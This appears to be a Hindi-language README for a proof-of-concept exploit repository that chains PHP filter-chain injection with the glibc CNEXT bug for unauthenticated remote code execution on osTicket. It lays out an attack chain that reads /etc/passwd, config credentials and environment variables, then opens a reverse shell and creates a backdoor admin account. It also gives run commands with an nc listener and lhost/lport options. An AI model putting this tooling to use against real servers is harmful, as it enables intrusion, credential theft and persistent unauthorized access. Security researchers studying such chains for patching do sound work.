पूर्ण-श्रृंखला शोषण जो PHP फ़िल्टर चेन इंजेक्शन और CVE-2024-2961 (CNEXT) को संयोजित करता है, कमजोर osTicket इंस्टॉलेशनों पर बिना प्रमाणीकरण के Remote Code Execution के लिए।
PHP फ़िल्टर चेन इंजेक्शन को CVE-2024-2961 (CNEXT) के साथ जोड़कर, कमजोर osTicket इंस्टॉलेशन पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) प्राप्त करने वाली पूर्ण-श्रृंखला शोषण।
इस रिपॉजिटरी में CVE-2026-22200 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण है, जो osTicket संस्करण ≤ 1.18.2 को प्रभावित करने वाली एक गंभीर कमजोरी है। यह शोषण दो शक्तिशाली तकनीकों को जोड़ता है:
परिणाम: कमजोर osTicket सर्वर पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन।
CVSS स्कोर: 9.8 (गंभीर)
osTicket का mPDF एकीकरण बिना प्रमाणीकरण वाले उपयोगकर्ताओं को सपोर्ट टिकटों में विशेष रूप से तैयार HTML पेलोड के माध्यम से दुर्भावनापूर्ण PHP फ़िल्टर चेन इंजेक्ट करने की अनुमति देता है। इससे संभव है:
मूल कारण: mPDF को भेजने से पहले उपयोगकर्ता द्वारा प्रदान किए गए HTML में इमेज URL का अपर्याप्त सत्यापन।
CVSS स्कोर: 9.8 (गंभीर)
ISO-2022-CN-EXT कैरेक्टर सेट को प्रोसेस करते समय glibc के iconv() में बफर ओवरफ़्लो। PHP फ़िल्टर चेन के साथ मिलकर, यह अनुमति देता है:
कमजोर glibc संस्करण: < 2.39 (फ़रवरी 2024)
┌─────────────────────────────────────────────────────────────────┐
│ 1. टोही │
│ └─ osTicket का पता लगाएँ, समृद्ध-पाठ विषयों की पहचान करें│
└─────────────────────────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────────────────────────┐
│ 2. प्रमाणीकरण │
│ └─ स्वयं-पंजीकरण करें या मौजूदा क्रेडेंशियल का उपयोग करें│
└─────────────────────────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────────────────────────┐
│ 3. फ़ाइल बहिर्वेशन (PHP फ़िल्टर चेन) │
│ ├─ /etc/passwd │
│ ├─ include/ost-config.php (DB क्रेडेंशियल, SECRET_SALT) │
│ ├─ /proc/self/maps (मेमोरी लेआउट) │
│ └─ /proc/self/environ (पर्यावरण चर) │
└─────────────────────────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────────────────────────┐
│ 4. LIBC फ़िंगरप्रिंटिंग │
│ ├─ फ़िल्टर चेन के माध्यम से आंशिक libc निकालें │
│ ├─ GNU बिल्ड आईडी निकालें │
│ └─ libc.rip से पूर्ण libc डाउनलोड करें │
└─────────────────────────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────────────────────────┐
│ 5. CNEXT RCE शोषण │
│ ├─ हीप भ्रष्टाचार पेलोड जनरेट करें │
│ ├─ टिकट उत्तर के माध्यम से इंजेक्ट करें (फ़िल्टर निष्पादन│
│ │ सुधारों के साथ) │
│ ├─ PDF निर्यात के माध्यम से ट्रिगर करें (सर्वर क्रैश) │
│ └─ रिवर्स शेल निष्पादित करें │
└─────────────────────────────────────────────────────────────────┘
↓
┌─────────────────────────────────────────────────────────────────┐
│ 6. पोस्ट-एक्सप्लॉयटेशन │
│ ├─ इंटरैक्टिव रिवर्स शेल │
│ ├─ डेटाबेस पहुँच (बहिर्वेशित DBPASS का उपयोग करके) │
│ └─ बैकडोर व्यवस्थापक खाता बनाएँ │
└─────────────────────────────────────────────────────────────────┘
# रिपॉजिटरी क्लोन करें
git clone https://github.com/Clarissss/osTicketFileReadIntoRCE
cd osTicketFileReadIntoRCE
# आवश्यक पैकेज स्थापित करें
pip install -r requirements.txt
requirements.txt:
requests>=2.31.0
PyMuPDF>=1.23.0
Pillow>=10.0.0
pwntools>=4.11.0
python3 -m venv venv
source venv/bin/activate # Linux/macOS
# या
venv\Scripts\activate # Windows
pip install -r requirements.txt
# टर्मिनल 1: लिसनर शुरू करें
nc -lvnp 4444
# टर्मिनल 2: शोषण चलाएँ
python3 osticket_revshell.py https://target.com/osticket \
--lhost YOUR_IP \
--lport 4444
python3 osticket_exploit.py https://target.com/osticket
# प्रॉक्सी का उपयोग करें (Burp Suite)
python3 osticket_revshell.py https://target.com/osticket \
--lhost 10.0.0.5 \
--lport 4444 \
--proxy http://127.0.0.1:8080
# विशेष हेल्प-टॉपिक आईडी बलपूर्वक
python3 osticket_exploit.py https://target.com/osticket \
--topic-id 2
# रंगीन आउटपुट अक्षम करें (लॉगिंग के लिए)
python3 osticket_exploit.py https://target.com/osticket --no-color
यदि पंजीकरण अक्षम है, तो आपसे क्रेडेंशियल माँगे जाएँगे:
python3 osticket_exploit.py https://target.com/osticket
[?] नए खाते के लिए ईमेल दर्ज करें (या मौजूदा): [email protected]
[?] पासवर्ड दर्ज करें: ********
शोषण एक परिष्कृत फ़िल्टर चेन का उपयोग करता है जो मनमानी फ़ाइलों में BMP हैडर जोड़ता है, mPDF की फ़ाइल प्रकार प्रतिबंधों को बायपास करते हुए: